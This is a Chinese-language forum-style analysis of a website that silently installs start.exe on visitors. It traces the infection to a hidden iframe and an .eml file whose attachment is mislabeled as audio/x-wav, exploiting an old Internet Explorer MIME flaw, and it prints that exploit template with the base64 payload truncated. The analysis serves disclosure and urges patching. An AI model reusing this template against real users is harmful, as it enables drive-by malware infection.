一种危险的木马植入方法
backlighting
scning@263.net
今天在www.xfocus.net安全论坛上看见有帖子说www.maylu.com登录这个网站后会自动下载一个start.exe的程序并自动运行。于是上到这个网站上看了一下,
打开IE浏览器:在地址栏中输入:http://www.maylu.com/index.asp
在网页打开的过程中鼠标奇怪的变成沙漏的状态,看来的确是有程序在运行。打开计算机的任务管理器,可以看到多了一个start.exe的进程。进程对应的文件是\winnt\system32\start.exe(在我的win2000上是这样)并且start.exe已经将自己登记在注册表开机启动项中。这样每次开机都会运行start.exe。
start.exe运行后占有系统资源,不断的向外发送数据,用sniffer看了一下,还好,发送的都是HTTP请求,仔细检查系统也没发现什么其他损害的地方。看来木马并不是恶意的。
让我感兴趣的是木马是如何下载到浏览主页的用户的计算机上并运行起来的。于是和teawater一块研究了一下。定制了一下IE的安全级别,将ActiveX支持等都全部关掉,再浏览网页,还是下载并运行了。看来和ActiveX无关。把IE的安全级别中文件下载禁止了,再上去,这回不让再下载了。
看来还是看看这程序是如何下载到自己计算机上的,打开问题网页的源代码看了看,网页代码最后面有这么一句话。
<iframe src=t.eml width=1 height=1>
网页中干吗要有.eml文件,这不是邮件的格式吗。在IE浏览器中输入
http://www.maylu.com/t.eml
再看看任务管理器,start.exe进程有回来了,原来问题就在这个文件上。既然问题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来
鼠标刚点上去,start.exe又被执行了。
用uedit7打开内容看看,内容入下
From: "xxx" <xxxx@xxx.xxx>
To: "xxx" <xxxx@xxx.xxx>
Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
</BODY>
</HTML>
--2--
--1
Content-Type: audio/x-wav;
name="start.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUACAAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQAAAAEAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHDGAACcAAAAAMAAAHAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......(删掉一大节)
--1
后面的不管它,那就是start.exe经过base64编码的内容。
关键是前面这一段
Content-Type: audio/x-wav;
name="start.exe"
把start.exe的的类型定义为audio/x-wav,这下清楚了,这是利用客户端支持的 MIME(多部分网际邮件扩展,Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型为audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,,结果导致邮件文件t.eml中的附件start.exe被执行。在win2000上,即使是用鼠标点击下载下来的t.eml,或是拷贝粘贴,都会导致t.eml中的附件被运行,微软的这个漏洞可害人不浅啊。
还好这个start.exe没有什么恶意,只是想利用用户帮自己赚点广告费而已。虽然这做法有点卑鄙,不过还是可以原谅。话又说回来,要是这里面运行的是一个木马或者是一个恶意程序的话有如何......。
赶快打补丁吧
http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp
